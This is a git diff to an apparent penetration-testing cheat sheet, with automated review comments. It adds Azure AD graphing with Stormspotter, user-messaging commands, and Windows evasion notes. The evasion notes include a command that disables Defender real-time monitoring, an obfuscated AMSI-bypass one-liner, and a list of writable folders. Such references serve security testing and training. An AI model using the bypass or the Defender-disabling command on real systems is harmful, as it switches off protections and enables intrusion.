diff --git a/Methodology and Resources/Cloud - Azure Pentest.md b/Methodology and Resources/Cloud - Azure Pentest.md index f8c1857..056261a 100644 --- a/Methodology and Resources/Cloud - Azure Pentest.md +++ b/Methodology and Resources/Cloud - Azure Pentest.md @@ -205,6 +205,19 @@ PS C:\> .\AzureADRecon.ps1 -Credential $creds PS C:\>.\AzureADRecon.ps1 -GenExcel C:\AzureADRecon-Report- ``` +Stormspotter, graphing Azure and Azure Active Directory objects + +```powershell +$ docker run --name stormspotter -p7474:7474 -p7687:7687 -d --env NEO4J_AUTH=neo4j/[password] neo4j:3.5.18 +git clone https://github.com/Azure/Stormspotter +cd Stormspotter +pipenv install . +stormspotter --cli +stormdash -dbu -dbp +Browse to http://127.0.0.1:8050 to interact with the graph. +``` + +Other interesting commands to enumerate Azure AD. ```powershell # Azure AD powershell module @@ -470,7 +483,7 @@ NOTE: By default, O365 has a lockout policy of 10 tries, and it will lock out an ## References * [An introduction to penetration testing Azure - Graceful Security](https://www.gracefulsecurity.com/an-introduction-to-penetration-testing-azure/) -* [Running POwershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) +* [Running Powershell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/) * [Attacking Azure Cloud shell - Netspi](https://blog.netspi.com/attacking-azure-cloud-shell/) * [Maintaining Azure Persistence via automation accounts - Netspi](https://blog.netspi.com/maintaining-azure-persistence-via-automation-accounts/) * [Detecting an attacks on active directory with Azure - Smartspate](https://www.smartspate.com/detecting-an-attacks-on-active-directory-with-azure/) diff --git a/Methodology and Resources/Miscellaneous - Tricks.md b/Methodology and Resources/Miscellaneous - Tricks.md new file mode 100644 index 0000000..1794178 --- /dev/null +++ b/Methodology and Resources/Miscellaneous - Tricks.md 
@@ -0,0 +1,17 @@ +# Miscellaneous & Tricks + +All the tricks that couldn't be classified somewhere else. + +## Send a message to another user + +```powershell +# Windows +PS C:\> msg Swissky /SERVER:CRASHLAB "Stop rebooting the XXXX service !" +PS C:\> msg * /V /W /SERVER:CRASHLAB "Hello all !" + +# Linux +$ wall "Stop messing with the XXX service !" +$ wall -n "System will go down for 2 hours maintenance at 13:00 PM" # "-n" only for root +$ who +$ write root pts/2 # press Ctrl+D after typing the message. +``` \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index f71519c..095b4ed 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -6,7 +6,11 @@ * [Windows Version and Configuration](#windows-version-and-configuration) * [User Enumeration](#user-enumeration) * [Network Enumeration](#network-enumeration) -* [AppLocker Enumeration](#applocker-enumeration) +* [Antivirus & Detections](#antivirus--detections) + * [Windows Defender](#windows-defender) + * [AppLocker Enumeration](#applocker-enumeration) + * [Powershell](#powershell) + * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) * [Search for file contents](#search-for-file-contents) 
@@ -223,11 +227,55 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse ``` -## AppLocker Enumeration +## Antivirus & Detections + +### Windows Defender + +```powershell +# check status of Defender +PS C:\> Get-MpComputerStatus + +# disable Real Time Monitoring +PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus +``` + +### AppLocker Enumeration - With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script). +List AppLocker rules + +```powershell +PS C:\> $a = Get-ApplockerPolicy -effective +PS C:\> $a.rulecollections +``` + +### Powershell + +Default powershell locations in a Windows system. + +```powershell +C:\windows\syswow64\windowspowershell\v1.0\powershell +C:\Windows\System32\WindowsPowerShell\v1.0\powershell +``` + +Example of AMSI Bypass. + +```powershell +PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) +``` + + +### Default Writeable Folders + +```powershell +C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys +C:\Windows\System32\spool\drivers\color +C:\Windows\Tasks +C:\windows\tracing +``` + ## EoP - Looting for passwords ### SAM and SYSTEM files
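Review bot: the Stormspotter block added to Cloud - Azure Pentest.md is fenced as ```powershell but contains POSIX-style lines (`$ docker run ...`, `git clone`, `cd Stormspotter`, `pipenv install .`) and a prose sentence ("Browse to http://127.0.0.1:8050 to interact with the graph.") inside the fence; tag the block as shell or drop the `$` prompt to match the `PS C:\>` convention used elsewhere in the file, and move the "Browse to" sentence below the closing fence. Also `stormdash -dbu -dbp` is shown with no values for the two flags, which appear to take the Neo4j username and password that the `NEO4J_AUTH=neo4j/[password]` docker line sets; suggest `stormdash -dbu neo4j -dbp [password]` so the two lines visibly agree.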
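Review bot: the References hunk in Cloud - Azure Pentest.md fixes "POwershell" but leaves "Powershell"; the product name is "PowerShell", so `* [Running PowerShell scripts on Azure VM - Netspi](https://blog.netspi.com/running-powershell-scripts-on-azure-vms/)`. The unchanged context line "Detecting an attacks on active directory with Azure" also has a grammar error ("Detecting attacks on Active Directory with Azure") that could be fixed in the same commit.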
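Review bot: the new Miscellaneous - Tricks.md ends without a trailing newline (`\ No newline at end of file`), and its single ```powershell fence mixes the Windows `msg` commands with the Linux `wall`, `who` and `write` commands; split it into two fences (powershell and bash) so the `$` and `PS C:\>` prompts each sit in a correctly tagged block. Minor: "13:00 PM" mixes 24-hour and 12-hour notation, use "13:00"; and `$ who` is listed with no comment, whereas `write root pts/2` has one, so a short comment saying `who` is how the tty name (pts/2) is obtained would make the sequence self-explanatory.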
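Review bot: the TOC hunk in Windows - Privilege Escalation.md correctly nests "Windows Defender", "AppLocker Enumeration", "Powershell" and "Default Writeable Folders" under "Antivirus & Detections", and the `#antivirus--detections` anchor matches GitHub's slug rule (the `&` is dropped, leaving a double hyphen). Style point: "Powershell" should be "PowerShell" in both this entry and the matching `### Powershell` heading; the `#powershell` anchor is unaffected.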
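Review bot: the "Windows Defender" subsection in the body hunk of Windows - Privilege Escalation.md shows `Set-MpPreference -DisableRealtimeMonitoring $true` with no prerequisites or footprint stated: it needs an elevated session, has no effect when Tamper Protection is on, and the change is written to the Microsoft-Windows-Windows Defender/Operational log (event 5001, real-time protection disabled), which is what defenders alert on; since the section is titled "Antivirus & Detections", add those two sentences so readers know why the command may fail and what it leaves behind. Smaller points: the "Default powershell locations" and "Default Writeable Folders" fences contain bare paths rather than PowerShell, so a plain or `text` fence is more accurate, and the two PowerShell paths should end in `.exe` with a note that the SysWOW64 copy is the 32-bit host; the AppLocker context line "- With the GPO - HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script)." is a fragment, reword to "AppLocker rules deployed by GPO are stored under HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (subkeys: Appx, Dll, Exe, Msi and Script)."; and there is a double blank line before `### Default Writeable Folders`.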